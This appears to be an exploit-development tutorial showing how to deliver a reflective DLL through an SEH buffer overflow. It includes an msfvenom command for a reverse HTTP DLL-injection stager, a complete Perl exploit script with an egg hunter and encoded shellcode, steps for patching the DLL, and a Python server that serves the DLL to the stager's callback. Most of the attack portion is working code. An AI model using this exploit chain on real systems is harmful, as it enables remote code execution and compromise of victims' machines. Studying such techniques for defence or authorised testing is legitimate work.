Introduction
Reflective DLL injection loads a DLL into a process without ever reading it from disk. A stager executed from the exploited buffer retrieves the DLL from a server and maps it directly into the process address space; execution is then handed to the DLL's exported ReflectiveLoader, which finishes the mapping and calls the DLL's entry point.
To understand how in-memory DLL injection evolved, I recommend reading the following two papers, in this order:
- Remote Library Injection by skape
- Reflective DLL Injection by Stephen Fewer
Setup
We’ll use the exploit from the previous egg hunting tutorial.
Implementation
Stager
Metasploit offers several stagers that retrieve and inject a DLL. This tutorial uses the reverse HTTP stager.
Generate the payload as follows:
msfvenom -p windows/dllinject/reverse_http lhost=192.168.29.1 lport=80 dll=. -e x86/shikata_ga_nai -b '\x00\x1a' -f perl
Insert the generated shellcode into the exploit script:
use strict;
use warnings;

# Output file that the vulnerable application will parse.
my $file = "attack_test.txt";

# Overflow layout taken over from the egg hunting tutorial:
# filler up to the SEH record, then the next-SEH short jump and the
# SEH handler overwrite (a pop/pop/ret address), then the egg hunter.
my $overflow = "0123456789ABCDEF";
my $eip = "AAAA";
my $fill = "B" x 52;
my $nextseh = "\xeb\x06\x90\x90";             # jmp short +6 over the SEH pointer
my $seh = pack('V',0x123418D4);               # pop/pop/ret, little-endian
my $padding = "\x90" x 0x29;

# Egg hunter searching for the "w00tw00t" tag in front of the stager.
my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t".
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# windows/dllinject/reverse_http stager generated by msfvenom above,
# encoded with x86/shikata_ga_nai (bad chars \x00 and \x1a).
my $reverse_http_stager =
"\xb8\xc9\xb5\x30\xb9\xdb\xd6\xd9\x74\x24\xf4\x5d\x29\xc9" .
"\xb1\x5e\x31\x45\x15\x03\x45\x15\x83\xc5\x04\xe2\x3c\x49" .
"\xd8\x3b\xbe\xb2\x19\x5c\x37\x57\x28\x5c\x23\x13\x1b\x6c" .
"\x20\x71\x90\x07\x64\x62\x23\x65\xa0\x85\x84\xc0\x96\xa8" .
"\x15\x78\xea\xab\x95\x83\x3e\x0c\xa7\x4b\x33\x4d\xe0\xb6" .
"\xb9\x1f\xb9\xbd\x6f\xb0\xce\x88\xb3\x3b\x9c\x1d\xb3\xd8" .
"\x55\x1f\x92\x4e\xed\x46\x34\x70\x22\xf3\x7d\x6a\x27\x3e" .
"\x34\x01\x93\xb4\xc7\xc3\xed\x35\x6b\x2a\xc2\xc7\x72\x6a" .
"\xe5\x37\x01\x82\x15\xc5\x11\x51\x67\x11\x94\x42\xcf\xd2" .
"\x0e\xaf\xf1\x37\xc8\x24\xfd\xfc\x9f\x63\xe2\x03\x4c\x18" .
"\x1e\x8f\x73\xcf\x96\xcb\x57\xcb\xf3\x88\xf6\x4a\x5e\x7e" .
"\x07\x8c\x01\xdf\xad\xc6\xac\x34\xdc\x84\xb8\xa4\xbb\x42" .
"\x39\x51\x34\xc2\x57\xc8\xee\x7c\xe4\x7d\x28\x7a\x0b\x54" .
"\x05\x5f\xa0\x04\x36\x0c\x14\xc3\x82\xe4\xe3\xb4\x0d\xdd" .
"\x47\xe8\x9b\xdd\x34\x5d\x31\xb2\x52\xc5\xc5\x32\xa3\x29" .
"\x9c\x55\xc4\x04\x57\xe9\x7a\x1e\x12\x69\x30\xaa\x83\x28" .
"\xac\x12\x0b\x9d\x5b\x39\x5c\x70\xce\xff\xc7\x17\x9f\xcf" .
"\x40\x94\x0a\x72\x1f\x67\xf0\x1d\xf2\x32\xa2\x8e\x60\xdb" .
"\x0a\x08\x01\x65\x9b\xd8\xc8\x5e\xad\x1c\x7a\xc9\x06\x94" .
"\xe5\xcf\x56\x73\x90\x16\xfb\x14\xa2\x94\x9c\x60\xf1\xcb" .
"\x0f\x3e\xa6\xbd\xc7\x2b\x1d\x6c\x23\x53\x48\xe6\x39\xa1" .
"\x2d\x54\xed\xe6\x82\x0c\x79\x24\x22\xa9\x02\xc9\xff\x4c" .
"\x34\x40\xf7\x01\xc0\x46\xef\xd7\x2a\x99\xef\x8d\x6a\xf1" .
"\xef\x41\x6b\x01\x87\x61\x6b\x41\x57\x31\x03\x19\xf3\xe6" .
"\x36\x66\x2e\x9b\xea\xca\x59\x7b\x5b\x85\x59\xa4\x64\x55" .
"\x0a\xf2\x0c\x47\x3a\x73\x2e\x98\x97\x01\x6f\x13\xd8\x81" .
"\x77\xdd\x25\x10\xb7\xa8\x4c\x43\xfb\x0c\x66\xff\x04\x4d" .
"\x89\x31\xc2\x80\x5b\x03\x02\xdd\x8d\x51\x53\x33\xe0\x95" .
"\x18\xbb\xb7\x34\x08\x56\xb7\x6b\x4a\x73";

open(my $FILE, '>', $file) or die "Cannot open $file: $!";
# The stager contains \x0a bytes; without binmode a Perl on Windows would
# rewrite them as \x0d\x0a in text mode and corrupt the shellcode.
binmode($FILE);
print $FILE $overflow.$eip.$fill.$nextseh.$seh.$egghunter.$padding."w00tw00t".$reverse_http_stager;
close($FILE);
print "File created\n";
Compile Reflective DLL
Get Stephen Fewer's ReflectiveDLLInjection code repository. Add your own code to the DLL project, keep the exported ReflectiveLoader function in place (the stager depends on it), and compile it.
Patch Reflective DLL
Normally Metasploit adds a small bootstrap stub to the reflective DLL's header before delivering it. When the DLL is self-hosted on a web server instead, it has to be patched manually.
For this purpose use Borja Merino's Python script: https://github.com/BorjaMerino/reflectPatcher.py/blob/master/reflectPatcher.py
Besides patching the header, the script prepends 4 bytes of size information in front of the actual header. The HTTP stager does not expect this length prefix (it fetches the DLL as a plain response body), so remove those 4 bytes with a hex editor before hosting the file.
Hosting Reflective DLL
The stager fetches the DLL with an HTTP GET whose URI is a random-looking string. Depending on the web server in use, you may have to map that request to the actual DLL file, for example with an alias, URL rewriting, or a handler that returns the DLL regardless of the requested path.
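Preparing and hosting the patched DLL, as an added example covering the two steps above; this is not code from the original tutorial, from reflectPatcher.py or from Metasploit. It assumes (my assumptions, not stated by the page) that the patcher's output is a 4-byte little-endian length followed by the patched image, and that the reverse_http stager accepts the raw DLL bytes as the response body for whatever URI it requests. The script strips the prefix (refusing to damage an already stripped file or a file whose prefix does not match its length), checks that what remains still looks like a PE image, and answers every GET with the DLL so no web-server alias is needed.

```python
#!/usr/bin/env python3
"""Strip the 4-byte size prefix from a reflectPatcher.py output and serve the
bare DLL on every GET for the windows/dllinject/reverse_http stager.

Added example. Assumption: the patched file is <u32le size><MZ image>.
"""
import struct
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer


def strip_size_prefix(blob: bytes) -> bytes:
    """Return the DLL without the 4-byte length prefix.

    A file that already starts with "MZ" is returned untouched, so running
    this twice does not eat the DOS header. A prefix that does not match the
    remaining length means the file is not what we think it is, so we stop.
    """
    if len(blob) < 4:
        raise ValueError("input too short to be a prefixed DLL")
    if blob[:2] == b"MZ":
        return blob  # already a bare DLL
    (size,) = struct.unpack("<I", blob[:4])
    body = blob[4:]
    if size != len(body):
        raise ValueError(f"size prefix {size} != payload length {len(body)}")
    if body[:2] != b"MZ":
        raise ValueError("data after the prefix is not an MZ image")
    return body


def looks_like_pe(image: bytes) -> bool:
    """Cheap sanity check: MZ signature and "PE\\0\\0" at e_lfanew (offset 0x3C)."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    return image[e_lfanew:e_lfanew + 4] == b"PE\0\0"


class AnyPathDllHandler(BaseHTTPRequestHandler):
    """Serve the DLL for every GET, whatever random URI the stager asks for."""

    dll = b""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(self.dll)))
        self.end_headers()
        self.wfile.write(self.dll)

    def log_message(self, fmt, *args):
        # Print the requested URI; handy when checking that the stager called back.
        sys.stderr.write("%s - %s\n" % (self.client_address[0], fmt % args))


def load_dll(path: str) -> bytes:
    """Read the patched file, strip the prefix and verify the result."""
    with open(path, "rb") as f:
        dll = strip_size_prefix(f.read())
    if not looks_like_pe(dll):
        raise ValueError(f"{path}: not a PE image after stripping the prefix")
    return dll


def serve(dll_path: str, port: int = 80) -> None:
    AnyPathDllHandler.dll = load_dll(dll_path)
    HTTPServer(("0.0.0.0", port), AnyPathDllHandler).serve_forever()


if __name__ == "__main__":
    # Usage: python3 host_dll.py reflective_patched.dll 80   (port must match LPORT)
    serve(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 80)
```

The port has to match the LPORT given to msfvenom (80 in the command above), and the host must be reachable at LHOST from the target. Because the handler ignores the path, the random URI the stager generates needs no mapping; with a real web server you would achieve the same with an alias or a rewrite rule.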
Exploit execution
Run the exploit and watch the DLL injection in action: